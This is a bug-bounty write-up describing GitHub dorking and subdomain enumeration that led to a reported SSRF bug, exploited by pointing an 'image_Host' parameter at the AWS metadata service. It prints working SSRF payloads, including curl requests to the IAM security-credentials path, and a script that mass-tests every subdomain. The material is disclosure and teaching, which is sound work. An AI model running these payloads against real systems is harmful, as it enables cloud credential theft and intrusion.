How GitHub recon helped me find NINE full SSRF vulnerabilities with AWS metadata access

Hi, everyone

My name is Santosh Kumar Sha, and I’m a security researcher from India (Assam). In this article, I will describe how I was able to find 9 full SSRF vulnerabilities with AWS metadata access by doing some GitHub recon.

I am now offering 1:1 sessions to share my knowledge and expertise:

topmate.io/santosh_kumar_sha

SPECIAL COVID-19 Note:

Don’t go outside without any reason. Stay home, be safe, and keep others safe too. A special request to my fellow bug-bounty hunters: take care of your health.

TOOLS used for the exploitation

1. subfinder (https://github.com/projectdiscovery/subfinder)

2. httpx (https://github.com/projectdiscovery/httpx)

3. gau, by Corben (https://github.com/lc/gau)

4. waybackurls, by tomnomnom (https://github.com/tomnomnom/waybackurls)

Story Behind the bug:

This is the write-up of a recent bug I found while doing recon on GitHub, and how I was able to find 9 SSRF vulnerabilities. I am not an expert in GitHub recon, but I like to find admin dashboards, paths, and endpoints on GitHub. If you want to learn about GitHub recon, follow @GodfatherOrwa and @th3g3nt3lman; they are legends at it.

Here it goes:

Suppose the target name is example.com and everything is in scope, like this:

In-scope : *.example.com

To gather all the subdomains from internet archives, I used the subfinder, gau, and waybackurls tools.

Command used:

subfinder -d example.com -silent

gau -subs example.com

waybackurls example.com

There is still a chance of missing subdomains, so to stay ahead of the game and not miss any subdomain during testing, I extracted the domains from the gau and waybackurls output with unfurl, ran subfinder as well, and saved everything to files.

So the final commands look like this:

gau -subs example.com | unfurl domains >> vul1.txt

waybackurls example.com | unfurl domains >> vul2.txt

subfinder -d example.com -silent >> vul3.txt

Now, collecting all the subdomains into one file and sorting out the duplicates:

cat vul1.txt vul2.txt vul3.txt | sort -u >> unique_sub.txt
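The three collection commands above can also be wrapped into a single pass. A minimal sketch of the same workflow, assuming the same tools and flags as above:

# Collect from all three sources in one pipeline and de-duplicate
{
  gau -subs example.com | unfurl domains
  waybackurls example.com | unfurl domains
  subfinder -d example.com -silent
} | sort -u > unique_sub.txt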

Now the actual GitHub recon starts:

GitHub holds a huge amount of data, and GitHub recon is a time-consuming task when you have to filter out information about the target. So I decided to target the users of the organization, since users are the weakest link and their tendency to leak secrets is higher. But the organization was huge, with more than 200 users, so searching each user takes a long time and there is a lot of information to filter. The syntax I used was like this:

“testdev.example.com” user:<username> <keytosearch>

“corps.example.com” user:<username> <keytosearch>

“test.example.com” user:<username> <keytosearch>
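With more than 200 users to cover, these dorks can also be scripted against the GitHub code-search API instead of the web UI. A minimal sketch, assuming a personal access token in $GITHUB_TOKEN (USERNAME and KEYWORD are placeholders, just like in the dorks above):

# One dork per API call; the code-search API requires authentication
curl -s -H "Authorization: token $GITHUB_TOKEN" \
  "https://api.github.com/search/code?q=%22testdev.example.com%22+user:USERNAME+KEYWORD"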

So I used some simple dorks like the ones below, but no leaks were found:

“testdev.admin.example.com” user:<username> auth_token

“testdev.admin.example.com” user:<username> apikey

“testdev.admin.example.com” user:<username> secret

So I decided to search with the organization name along with paths, endpoints, and commonly used parameters as keywords. The GitHub dorks looked like this:

First, I tried to find endpoints and paths for the admin and user dashboards:

“corps.example.com” org:<name of organization> “/admin/dashboard”

“testdev.example.com” org:<name of organization> “/users/dashboard”

“example.com” org:<name of organization> “/admin/setup”

But I didn’t get any useful output from that.

Next, I decided to look for some commonly used parameters, just to see what I would get:

“example.com” org:<name of organization> “next_url”

“example.com” org:<name of organization> “img_url”

Still no success. But then I used the parameter “image”:

“example.com” org:<name of organization> “image”

I saw a path leaked on GitHub by one of their users in a commit, and the endpoint with the URL looked like this:

/fetch/info?inquiry=&image_Host=https://example.com/user/

Now I just visited the URL in the browser with my fingers crossed, and it downloaded a text file with all the AWS internal metadata:

https://example.com/fetch/info?inquiry=&image_Host=http://169.254.169.254/

To keep it simple, I just used a curl command to see the AWS metadata:

curl -sk "https://example.com/fetch/info?inquiry=&image_Host=http://169.254.169.254/"
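From here, the same parameter can be pointed at the standard IMDSv1 paths to see how deep the access goes. These are the stock AWS metadata endpoints, nothing specific to this target:

# List the metadata root and the IAM role credentials (standard IMDSv1 paths)
curl -sk "https://example.com/fetch/info?inquiry=&image_Host=http://169.254.169.254/latest/meta-data/"
curl -sk "https://example.com/fetch/info?inquiry=&image_Host=http://169.254.169.254/latest/meta-data/iam/security-credentials/"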

Now, how I was able to find eight more SSRFs:

I don’t know how it came to my mind to test this endpoint on the other subdomains. I had already collected the subdomains and stored them in a file named “unique_sub.txt”.

cat unique_sub.txt | sort -u | httpx -silent -path "/fetch/info?inquiry=&image_Host=http://169.254.169.254/" -status-code -content-length
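httpx only reports the status code and content length, so to separate real SSRFs from plain 200 pages you can grep each response for a known metadata field. A rough sketch of that check (ami-id is one of the entries the IMDSv1 root listing returns):

# Flag only the hosts whose response actually contains metadata
while read -r sub; do
  curl -sk "https://$sub/fetch/info?inquiry=&image_Host=http://169.254.169.254/latest/meta-data/" | grep -q "ami-id" && echo "[VULN] $sub"
done < unique_sub.txt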

I finally got 8 more SSRFs via the same path on different subdomains.

I quickly reported the bug, and the next day the report was triaged as critical.

After seeing this, my reaction…

Takeaway

I’m sure a lot of security researchers have already seen this process, but this is how I approach finding endpoints leaked on GitHub by an organization’s users, and in commit pages, whether for unauthorized access or for finding vulnerabilities by exploiting the leaked endpoints.

That’s one of the reasons I wanted to share my experience, and also to highlight other techniques for exploiting such vulnerabilities.

Support me if you like my work! Buy me a coffee and follow me on Twitter.

Thanks for reading :)
Stay Safe.

https://twitter.com/killmongar1996


Santosh Kumar Sha (@killmongar1996)

Cloud Security | Security Researcher | Pentester | Bug bounty hunter | VAPT | Penetration tester | CTF player | topmate.io/santosh_kumar_sha